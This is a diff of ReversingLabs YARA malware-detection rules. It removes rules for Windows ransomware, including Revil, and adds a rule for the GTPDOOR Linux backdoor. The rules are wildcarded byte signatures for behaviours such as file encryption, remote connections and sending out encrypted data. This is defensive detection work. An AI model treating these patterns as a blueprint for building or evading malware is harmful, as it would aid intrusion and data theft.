?? + 0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 + 89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63 + FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48 + 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ?? + ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? + ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ?? + ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89 + E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 + F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E + ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? + ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 } - $encrypt_files_1 = { - BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ?? - ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D - 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D - 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? - ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? FF 75 - ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51 + $decrypt_configuration_p1 = { + 41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ?? + ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ?? + 48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 + 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ?? + ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? + ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ?? + ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 + DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48 + 8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C + 24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 + ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ?? + ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ?? + ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2 + AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04 + ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75 + ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ?? + ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8 } - $encrypt_files_2 = { - 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ?? - 89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ?? - ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ?? - 6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90 - 8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 - C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ?? - ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + $decrypt_configuration_p2 = { + 0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41 + BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? + ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1 + 4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 + ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? + ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 + D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44 + 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ?? + 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B + 44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? + ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 + 8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 + DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 + ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 + 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? + ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D } - $encrypt_files_3 = { - 55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50 - 89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF - 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ?? - ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? - 75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B - 35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 - 05 ?? ?? ?? ?? 85 DB 74 + $decrypt_configuration_p3 = { + 41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C + ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7 + C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24 + ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 + ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ?? + 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? + ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1 + 4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ?? + ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ?? + ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ?? + EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 } - $encrypt_files_4 = { - 8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB - ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2 + $encrypt_and_send_data = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C + 24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03 + 0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ?? + ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44 + 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48 + 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74 + ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89 + F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89 + EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 + ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83 + C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48 + 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24 + ?? 48 83 C4 ?? C3 } - $encrypt_files_5 = { - 66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ?? - 66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3 - ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5 - 53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A - ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3 + $receive_and_decrypt_data = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48 + 89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? + ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ?? + B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ?? + 85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 + ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? + C3 } condition: - uint16(0)==0x5A4D and ( all of ($search_files_*)) and ( all of ($encrypt_files_*)) + uint32(0)==0x464C457F and (( all of ($change_name_on_system_p*)) and ( all of ($decrypt_configuration_p*)) and ($encrypt_and_send_data) and ($receive_and_decrypt_data)) } -rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Backdoor_GTPDOOR : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Revil ransomware." + description = "Yara rule that detects GTPDOOR backdoor." author = "ReversingLabs" - id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3" - date = "2020-07-15" - modified = "2020-07-15" + id = "9e6df856-fe54-504c-8530-321adc91cd5a" + date = "2024-09-10" + modified = "2024-09-10" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Linux.Backdoor.GTPDOOR.yara#L1-L264" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7b4b33b7838142e34c6d02260b6585305c4730c90e12b1adc099f9aeecf071a" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Revil" + tc_detection_type = "Backdoor" + tc_detection_name = "GTPDOOR" tc_detection_factor = 5 importance = 25 strings: - $search_files = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89 - 5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ?? - ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ?? - 0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ?? - 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D - ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? - ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59 - 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85 - C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83 - C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85 - ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50 - 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 - FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D - ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3 - } - $remote_connection = { - 55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ?? - ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ?? - 89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 - 4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9 - ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ?? - ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89 - 08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 - C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75 - ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85 - ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? - ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ?? - ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B - 7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ?? - ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75 - ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ?? - 8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ?? - 75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 - F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ?? - ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83 - F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ?? - ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB - } - $enum_resources = { - 55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B - F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45 - ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? - 83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50 - FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75 - ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D - C3 + $send_result_to_peer_v1_p1 = { + 55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 66 89 85 ?? ?? ?? ?? 66 89 95 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? ?? ?? ?? ?? 77 ?? 0F B7 8D + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 EB ?? 8D 85 ?? ?? ?? ?? + 8B 55 ?? 89 C1 B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? + 8B 55 ?? 8B 45 ?? 89 42 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ?? + 